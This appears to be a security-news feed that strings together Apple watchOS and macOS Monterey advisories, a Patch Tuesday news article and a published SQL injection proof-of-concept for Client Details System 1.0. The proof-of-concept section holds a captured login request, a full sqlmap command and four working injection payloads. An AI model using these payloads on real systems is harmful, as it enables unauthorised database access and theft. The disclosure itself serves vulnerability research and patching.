Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23287: Kirin (@Pwnrin)

RTKit  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive user information  
Description: A race condition was addressed with improved state  
handling.  
CVE-2024-23239: Mickey Jin (@patch1t)

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23290: Wojciech Regula of SecuRing (wojciechregula.blog)

Share Sheet  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23231: Kirin (@Pwnrin) and luckyu (@uuulucky)

Siri  
Available for: Apple Watch Series 4 and later  
Impact: A person with physical access to a device may be able to use  
Siri to access private calendar information  
Description: A lock screen issue was addressed with improved state  
management.  
CVE-2024-23289: Lewis Hardy

Siri  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed through improved state management.  
CVE-2024-23293: Bistrit Dahal

UIKit  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An injection issue was addressed with improved validation.  
WebKit Bugzilla: 266703  
CVE-2024-23280: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

CoreAnimation  
We would like to acknowledge Junsung Lee for their assistance.

CoreMotion  
We would like to acknowledge Eric Dorphy of Twin Cities App Dev LLC for  
their assistance.

Find My  
We would like to acknowledge Meng Zhang (鲸落) of NorthSea for their  
assistance.

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) for their  
assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, and Ned Williamson of Google  
Project Zero for their assistance.

libxpc  
We would like to acknowledge Rasmus Sten, F-Secure (Mastodon:  
@pajp@blog.dll.nu), and an anonymous researcher for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Sandbox  
We would like to acknowledge Zhongquan Li (@Guluisacat) for their  
assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Software Update  
We would like to acknowledge Bin Zhang of Dublin City University for  
their assistance.

WebKit  
We would like to acknowledge Nan Wang (@eternalsakura13) of 360  
Vulnerability Research Institute, Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqceUACgkQX+5d1TXa  
IvonOhAAwwl6+Y0b68Rv2candfehqbFS9AF1RoPqGJyBZ+BcPszyPktyhxfBV7jQ  
HRiR/GCFn+m8wFtARsEQ7dqe2me/qW7Gmq7jre5A4oasMNJzSWJ/5y1hcKkbnT2A  
tWYzbqtDTmxwcPgOPEZxmOZr85TRcWcyHqOMFFKXM5iwq6bChItd0q4YqpDKIJqJ  
VvrmxWZ8xEhAqxuWUMDomGEldQB+omlZDdE+Vy6cr+vJRUt9J06GQghZG5lVTQI3  
Bv0wuNhmm0cw9rKOhUeqCwWjjzKqUodz70RgK3ihvlq3348BTNaKVL7rj/Xjla32  
Ov5VUqgPl7TZ+cndITT2XTLD7PV5Jcb5emyQiMlVmUS+gLs0EDcwdelycsZ9BWIy  
lMIqapJojAtaUiMSxgjYiILpNvBpgtgwh7kVNzPh5B740H5GuEF5WTtSDWupJ+/R  
voTF1VIBeG/Q3W63Sg39D909Gw+xoiqtw+EF4E44xrzAnNb6mefbUpNKu9533WcD  
wpJzg0lj0cTHwEvOHMqARVoFGNf8a8awPHzwugiZVuigW7eKjm+iXkhKJRxovi5r  
A2UlktISxWrcJ4jD3BS/MLOtD62IKIH4yWr7TR9Lku3JE7X4TZHzqzcOzPaTTCl7  
NGW88NsCC7F1k2kJltcEXBP4WhkMJNcZzBjJRoahScWUOxNd0FE=  
=6g/T  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-5

Apple Security Advisory 03-07-2024-4 - macOS Monterey 12.7.4 addresses buffer overflow, bypass, code execution, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4

macOS Monterey 12.7.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214083.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Admin Framework  
Available for: macOS Monterey  
Impact: An app may be able to elevate privileges  
Description: A logic issue was addressed with improved checks.  
CVE-2024-23276: Kirin (@Pwnrin)

Airport  
Available for: macOS Monterey  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23227: Brian McNulty

AppleMobileFileIntegrity  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-23269: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Monterey  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23247: m4yfly with TianGong Team of Legendsec at Qi'anxin Group

CoreCrypto  
Available for: macOS Monterey  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Dock  
Available for: macOS Monterey  
Impact: An app from a standard user account may be able to escalate  
privilege after admin user login  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23244: Csaba Fitzl (@theevilbit) of OffSec

Image Processing  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23270: an anonymous researcher

ImageIO  
Available for: macOS Monterey  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

ImageIO  
Available for: macOS Monterey  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23257: Junsung Lee working with Trend Micro Zero Day Initiative

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-23234: Murray Mike

Kerberos v5 PAM module  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-23266: Pedro Tôrres (@t0rr3sp3dr0)

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: macOS Monterey  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: macOS Monterey  
Impact: An app may be able to cause a denial-of-service  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-23201: Koh M. Nakagawa of FFRI Security, Inc. and an anonymous  
researcher

MediaRemote  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2023-28826: Meng Zhang (鲸落) of NorthSea

Metal  
Available for: macOS Monterey  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

Notes  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23283

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to elevate privileges  
Description: An injection issue was addressed with improved input  
validation.  
CVE-2024-23274: Bohdan Stasiuk (@Bohdan_Stasiuk)  
CVE-2024-23268: Mickey Jin (@patch1t), and Pedro Tôrres (@t0rr3sp3dr0)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to access protected user data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23275: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to bypass certain Privacy preferences  
Description: The issue was addressed with improved checks.  
CVE-2024-23267: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to overwrite arbitrary files  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-23216: Pedro Tôrres (@t0rr3sp3dr0)

SharedFileList  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved file handling.  
CVE-2024-23230: Mickey Jin (@patch1t)

Shortcuts  
Available for: macOS Monterey  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions checks.  
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts  
Available for: macOS Monterey  
Impact: Third-party shortcuts may use a legacy action from Automator to  
send events to apps without user consent  
Description: This issue was addressed by adding an additional prompt for  
user consent.  
CVE-2024-23245: an anonymous researcher

Storage Services  
Available for: macOS Monterey  
Impact: A user may gain access to protected parts of the file system  
Description: A logic issue was addressed with improved checks.  
CVE-2024-23272: Mickey Jin (@patch1t)

macOS Monterey 12.7.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqccMACgkQX+5d1TXa  
IvoRPw//aOvhmfw+nqXXgAMv5Ptm8/G29gC7vtiS6WVFJsmUEQA5aM5P8KYRT1VP  
UtxDS0ShqKze958tIsiGpOshP7jildMmv52VKLG3HIV8XTTgiSBmO7ODPheGQaaG  
wgUkoZbue7VRSr9UZEm8qbLPdJpCUIbSWJImRbE6k4+Ap1IqRsYVv01gLN9+Ohhw  
tv6ObXbqeKI7EjRcfxqAG/SdehWg2azogMsdrq+wfpaEZG+Fy6B2NPu8AOcKICRQ  
to8JKPWMvtoGjbns5r8OPd9O29z3icsIB8b3qfQZHTc5i/eWi++VoAhLR2lEq8Ts  
hUPbOyf1AU4BeFKCC2MI060lOwK1WE4LRvD/CWv0g02b+yW9lXQ5xTah4+ycYaEp  
vXbxtlp7Da8s0XTDACFVvfMMN7fi3NIBSjwtz6YnqN6cxVnV/re69UYwuT44aJ4s  
UA5NElkhe7NZJ1+QQ5mSws19+PjP7TZpdeaPxxQfr6JN2Mi0a52tCaCmF0gIZHJj  
/HyjQzJHb40w5e4Vqw2r4GxvgZvjmUiW4pvPXgKD+6Ykp+g4lhHldSSFnDakjSy3  
OUM2idhKAHeHdFSm6UEv4ehhJM660DbDRujaZPpVuSKpcqKS79vcjs/gD/EGt/uG  
rhwMQd321+WzaKcGxu0gbAVRMzAtP/yxMEovCU2zFfh3AxbopDg=  
=KbmJ  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-4

Client Details System version 1.0 suffers from a remote SQL injection vulnerability.

    + **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1+ **Date:** 2023-26-12+ **Exploit Author:** Hamdi Sevben+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip+ **Version:** 1.0+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53+ **CVE:** CVE-2023-7137## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140+ https://www.cve.org/CVERecord?id=CVE-2023-7137+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137## Description:Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data,  or exploit latest vulnerabilities in the underlying database.## Proof of Concept:+ Go to the User Login page: "http://localhost/clientdetails/"+ Fill email and password.+ Intercept the request via Burp Suite and send to Repeater.+ Copy and paste the request to a "r.txt" file.+ Captured Burp request:```POST /clientdetails/ HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/clientdetails/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36uemail=user@mail.com&login=LOG+IN&password=P@ass123```+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. ```python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db``````---Parameter: uemail (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123    Type: UNION query    Title: Generic UNION query (NULL) - 7 columns    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123---[14:58:11] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.53, PHP, PHP 8.1.6back-end DBMS: MySQL >= 5.0 (MariaDB fork)[14:58:11] [INFO] fetching current databasecurrent database: 'loginsystem'```+ current database: `loginsystem`![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)

Client Details System 1.0 SQL Injection

Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

The March 2024 Patch Tuesday update includes patches for 61 Microsoft vulnerabilities. Only two of the vulnerabilities are rated critical and both of these are found in Windows Hyper-V.

Hyper-V is a hardware virtualization product that allows you to run multiple operating systems as virtual machines (VMs) on Windows. A virtual machine is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and guests.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The Hyper-V CVEs patched in this round of updates are:

CVE-2024-21407 is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 8.1 out of 10. Microsoft says exploitation is less likely since this vulnerability would require an authenticated attacker on a guest to send specially crafted file operation requests to hardware resources on the VM which could result in remote code execution on the host server.

This means the attacker would need a good deal of information about the specific environment, and to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21408 is a Windows Hyper-V Denial of Service (DOS) vulnerability with a CVSS score of 5.5 out of 10. This means an attacker could target a host machine from a guest and cause it to crash or stop functioning. However, Microsoft did not provide any additional details on how this DOS could occur.

The attention for Hyper-V is remarkable since only a week earlier, VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation. VMware ESXi and Hyper-V are both designed to handle large-scale virtualization deployments.

Another vulnerability worth mentioning is CVE-2024-21334, which has a CVSS score of 9.8 out of 10. It’s an Open Management Infrastructure (OMI) RCE vulnerability that affects System Center Operations Manager (SCOM). SCOM is a set of tools in Microsoft’s System Center for infrastructure monitoring and application performance management. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.

OMI is an open source technology for environment management software products for Linux and Unix-based systems. The OMI project was set up to implement standards-based management so that every device in the world can be managed in a clear, consistent, and coherent way.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

Microsoft states that if the Linux machines do not need network listening, OMI incoming ports can be disabled. In other cases, customers running affected versions of SCOM (System Center Operations Manager 2019 and 2022) should update to OMI version 1.8.1-0.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Experience Manager
*   Adobe Premiere Pro
*   Adobe ColdFusion
*   Adobe Bridge
*   Adobe Lightroom
*   Adobe Animate

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-03-05 or later.

**Apple** has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities

**SAP** has released its March 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

Tag

#apple